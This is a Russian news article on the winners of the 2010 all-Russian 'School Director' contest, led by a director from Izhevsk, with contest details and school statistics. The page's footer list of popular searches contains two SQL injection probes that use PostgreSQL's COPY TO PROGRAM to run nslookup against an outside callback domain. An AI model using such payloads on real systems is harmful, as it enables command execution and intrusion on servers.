Последние новости
Новости образования /

Победителем конкурса "Директор школы 2010" стал директор из Ижевска

Абсолютным победителем Всероссийского конкурса "Директор школы 2010" и обладателем главного приза - "Хрустальной медали" стал директор школы №97 города Ижевска Ахтам Чугалаев, передает в среду корреспондент РИА Новости с церемонии награждения в Общественной палате РФ.

Директор ижевской школы построил школу-государство, организовал собственную систему повышения квалификации педагогов, модернизировал систему питания, ввел электронный журнал и собственный медико-педагогический центр с лицензией на медицинскую деятельность.

Диплом второй степени конкурса получил директор гимназии "Корифей" Екатеринбурга Алексей Бабетов. Директор санкт-петербургской школы №279 Анна Меньшикова удостоена диплома третьей степени.

В номинации "Любимый директор" лучшим руководителем, по мнению коллег, учеников и выпускников, а также родителей, стала директор школы №3 города Георгиевска Ставропольского края Елена Нурбекьян.

Заявки на участие в первом Всероссийском конкурсе "Директор школы" прислали около 700 руководителей образовательных учреждений более чем из 80 регионов России. Цель конкурса - выявление и изучение достижений успешных директоров школ для использования их управленческого опыта в других образовательных учреждениях и регионах. В конкурсе принимали участие 667 директоров из 81 региона России.

Конкурс проходил в два этапа. В ходе первого тура (заочного) жюри отобрало десять лучших работ, в которых директора на 20 страницах предлагали способы решения проблем своей школы. Второй (очный) тур прошел в формате творческого задания. Финалисты должны были описать эффективные, нестандартные способы решения школьных проблем и достигнутые результаты.

Лауреаты Всероссийского конкурса "Директор школы - 2010", получат стипендии на обучение в Московской высшей школе социальных и экономических наук (МВШСЭН) на факультете "Менеджмент в сфере образования". В программу включены выездные учебные сессии, научно-практическая конференция и научно-исследовательская практика. Каждый из участников сможет заниматься по индивидуальному учебному плану.

В России около 53,5 тысячи школ, из них сельских - 34,3 тысячи, городских - 19,2 тысячи. В них обучается 13,36 миллиона детей.

У нас находят:
  • testing';copy (select '') to program 'nslookup dns.sqli.13405.1964-2755.1964.35d70.1.bxss.me
  • testing';copy (select '') to program 'nslookup dns.sqli.13405.1964-1736.1964.a1f77.1.bxss.me
  • testing
имя


Популярые сообщения